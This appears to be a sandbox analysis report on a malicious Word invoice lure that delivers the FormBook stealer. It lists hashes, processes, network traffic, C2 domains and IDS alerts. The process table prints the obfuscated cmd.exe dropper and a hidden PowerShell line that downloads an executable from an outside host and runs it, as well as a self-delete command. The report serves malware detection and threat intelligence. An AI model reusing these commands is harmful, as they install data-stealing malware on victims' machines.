File name: | Proforma invoice.doc |
Full analysis: | https://app.any.run/tasks/592bd048-91af-4c73-a0b7-0289d9d30cd7 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer distributed as malware-as-a-service (MaaS). It differs from much competing malware in its extreme ease of use, which allows even inexperienced threat actors to deploy it. |
Analysis date: | January 17, 2019, 22:06:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: D!akov RePack, Template: Normal.dotm, Last Saved By: D!akov RePack, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 15 22:59:00 2019, Last Saved Time/Date: Tue Jan 15 22:59:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0 |
MD5: | 0AC75DBEB4025460CD9F076DCE9D9B7B |
SHA1: | 7E30F0B6614F3309DE4F7184EF38EFCB0D3A7266 |
SHA256: | 0DD37E4F6A326C5A21FE4052227B7FB81C3F2CA0B6E0ABC7607BD979D3B1E0CF |
SSDEEP: | 192:w+NslLZEvA+6/6rrILd/Kf3HO8teQMI9JRVEoS8CcJxuXyN0jBZdtpMia:wD8iSUR/8deU5S8PJUyN0jBLt+ |
Extension | Detected type (score)
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Property | Value
---|---
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CharCountWithSpaces: | - |
Paragraphs: | - |
Lines: | - |
Company: | diakov.net |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | - |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:01:15 22:59:00 |
CreateDate: | 2019:01:15 22:59:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 2 |
LastModifiedBy: | D!akov RePack |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | D!akov RePack |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process | User | Company | Integrity level | Description | Exit code | Version
---|---|---|---|---|---|---|---|---|---|---
2984 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Proforma invoice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Microsoft Word | 0 | 14.0.6024.1000
3016 | "C:\Windows\System32\cmd.exe" /v:ON /c"set done= && set x=oi9Bx(5Wc;Tnd:3m1lJ.hz/EMLwH%y)bCeFD'jpS\as-utN,Yr fP && for %H in (38,0,26,33,49,42,20,33,17,17,50,43,26,50,27,1,12,12,33,11,50,43,23,4,33,8,44,45,1,0,11,52,0,17,1,8,29,50,3,29,38,41,42,42,50,5,11,33,26,43,0,31,37,33,8,45,50,39,29,42,45,33,15,19,46,33,45,19,7,33,31,32,17,1,33,11,45,30,19,35,0,26,11,17,0,41,12,34,1,17,33,5,36,20,45,45,38,42,13,22,22,51,49,0,1,12,51,0,11,12,43,42,45,33,37,33,41,11,11,33,12,41,49,8,19,51,49,22,37,44,31,41,37,33,0,19,33,4,33,36,47,36,28,10,23,24,52,28,40,37,44,31,41,37,33,0,19,33,4,33,36,30,9,50,28,10,23,24,52,28,40,37,44,31,41,37,33,0,19,33,4,33,1618) DO (set done=!done!!x:~%H,1!) && if %H == 1618 call !done:~-182!" | C:\Windows\System32\cmd.exe | — | WINWORD.EXE | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1436 | powershell -w Hidden -ExecutionPolicy Bypass (new-object System.Net.WebClient).DownloadFile('https://froidfond-stejeannedarc.fr/jubajeo.exe','C:\Users\admin\AppData\Local\Temp\jubajeo.exe'); C:\Users\admin\AppData\Local\Temp\jubajeo.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
3540 | "C:\Users\admin\AppData\Local\Temp\jubajeo.exe" | C:\Users\admin\AppData\Local\Temp\jubajeo.exe | — | powershell.exe | admin | EDP - Energias de Portugal | MEDIUM | Dynamic IP Restriction Module | 0 | 8.1.23.2
2244 | "C:\Users\admin\AppData\Local\Temp\jubajeo.exe" | C:\Users\admin\AppData\Local\Temp\jubajeo.exe | — | jubajeo.exe | admin | EDP - Energias de Portugal | MEDIUM | Dynamic IP Restriction Module | 0 | 8.1.23.2
2744 | "C:\Windows\System32\dwm.exe" | C:\Windows\System32\dwm.exe | | explorer.exe | admin | Microsoft Corporation | MEDIUM | Desktop Window Manager | | 6.1.7600.16385 (win7_rtm.090713-1255)
3604 | /c del "C:\Users\admin\AppData\Local\Temp\jubajeo.exe" | C:\Windows\System32\cmd.exe | — | dwm.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
284 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | | admin | Microsoft Corporation | MEDIUM | Windows Explorer | | 6.1.7600.16385 (win7_rtm.090713-1255)
3464 | "C:\Program Files\Mozilla Firefox\Firefox.exe" | C:\Program Files\Mozilla Firefox\Firefox.exe | | dwm.exe | admin | Mozilla Corporation | MEDIUM | Firefox | 0 | 61.0.2
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE802.tmp.cvr | — | — | —
2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF190125782D0B8BB5.TMP | — | — | —
2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0B4C83C6-5501-47DD-B1AB-326D74EA6C66}.tmp | — | — | —
2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8A6F9EDB-1A43-410C-BB87-4DF3927C7DB0}.tmp | — | — | —
1436 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SOEZBHZ4YK394KCQHCXO.temp | — | — | —
1436 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
1436 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF215217.TMP | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2984 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 8F74DDB4BD71FB96CFA0B2BD6E374361 | B65F362B17437F851F916CC16A9A79276A5BD44FE57640300F2AAF3E3307CE1C
2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$oforma invoice.doc | pgc | 4D4565552C4E8B649B4B834DEBE0BF04 | A676D87E0DC7CFB00BEADB43196ADDF403EB77F0CE0BE34845E918C4977CD10E
2744 | dwm.exe | C:\Users\admin\AppData\Roaming\J11OTS2E\J11logrc.ini | binary | 7DD5EF3DBBB351ACFC3671A6E0F49047 | BCD6E29EC1D7F26598284623704D15326637F2E083F4ADDB0A82FF876FDC2B99
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
284 | explorer.exe | GET | — | 173.236.144.95:80 | http://www.associationla.com/sa/?Bj=m3bR0/i6QEl+JfsdQO8pqxfsfn4j/1iUeSC2s+iD7Qi/SW0i+RKzckpy58kFErSmSb8oPw==&b6=uVBXnLRHQZclu | US | — | — | malicious |
284 | explorer.exe | GET | — | 142.234.216.104:80 | http://www.haozi8.com/sa/?Bj=rkzcQG510u2z34k5Drjx9zT6eDKlaDgpWUthLNxv00ym3zvVe+b1EFLcja2u2sRHPViz4g==&b6=uVBXnLRHQZclu&sql=1 | US | — | — | malicious |
284 | explorer.exe | GET | — | 208.91.197.27:80 | http://www.laniedenslow.net/sa/?Bj=A9ORVt2ZoHYGBOl/VO2I067Ay5clWmiul+Pdhod07xICN8JiGnLpQCuwrEzMW0SmtHcO8w==&b6=uVBXnLRHQZclu&sql=1 | US | — | — | malicious |
284 | explorer.exe | POST | — | 64.98.145.30:80 | http://www.paapostille.com/sa/ | CA | — | — | malicious |
284 | explorer.exe | GET | 200 | 64.98.145.30:80 | http://www.paapostille.com/sa/?Bj=gqLAWY6+M9By5AAH2cRNr2rYDqe9NTZp7UAkwnK4XjckeIRQKQZpn9jUhEwRBUoyGaQvYw==&b6=uVBXnLRHQZclu&sql=1 | CA | html | 5.81 Kb | malicious |
284 | explorer.exe | POST | — | 64.98.145.30:80 | http://www.paapostille.com/sa/ | CA | — | — | malicious |
284 | explorer.exe | POST | — | 142.234.216.104:80 | http://www.haozi8.com/sa/ | US | — | — | malicious |
284 | explorer.exe | POST | — | 208.91.197.27:80 | http://www.laniedenslow.net/sa/ | US | — | — | malicious |
284 | explorer.exe | POST | — | 142.234.216.104:80 | http://www.haozi8.com/sa/ | US | — | — | malicious |
284 | explorer.exe | POST | — | 64.98.145.30:80 | http://www.paapostille.com/sa/ | CA | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
284 | explorer.exe | 64.98.145.30:80 | www.paapostille.com | Tucows.com Co. | CA | malicious |
284 | explorer.exe | 173.236.144.95:80 | www.associationla.com | New Dream Network, LLC | US | malicious |
1436 | powershell.exe | 213.186.33.40:443 | froidfond-stejeannedarc.fr | OVH SAS | FR | malicious |
284 | explorer.exe | 142.234.216.104:80 | www.haozi8.com | Nobis Technology Group, LLC | US | malicious |
284 | explorer.exe | 87.236.16.76:80 | www.naidi.info | Beget Ltd | RU | malicious |
284 | explorer.exe | 52.0.217.44:80 | www.alcoyindustrial.com | Amazon.com, Inc. | US | whitelisted |
284 | explorer.exe | 208.91.197.27:80 | www.laniedenslow.net | Confluence Networks Inc | US | malicious |
284 | explorer.exe | 199.192.26.77:80 | www.dozceb.com | — | US | malicious |
Domain | IP | Reputation
---|---|---
froidfond-stejeannedarc.fr | | malicious
www.associationla.com | | malicious
www.paapostille.com | | malicious
www.drkmatter.network | | unknown
www.haozi8.com | | malicious
www.naidi.info | | malicious
www.netaspor.net | | unknown
www.viplikesystem.com | | unknown
www.laniedenslow.net | | malicious
www.alcoyindustrial.com | | malicious
PID | Process | Class | Message |
---|---|---|---|
284 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
284 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |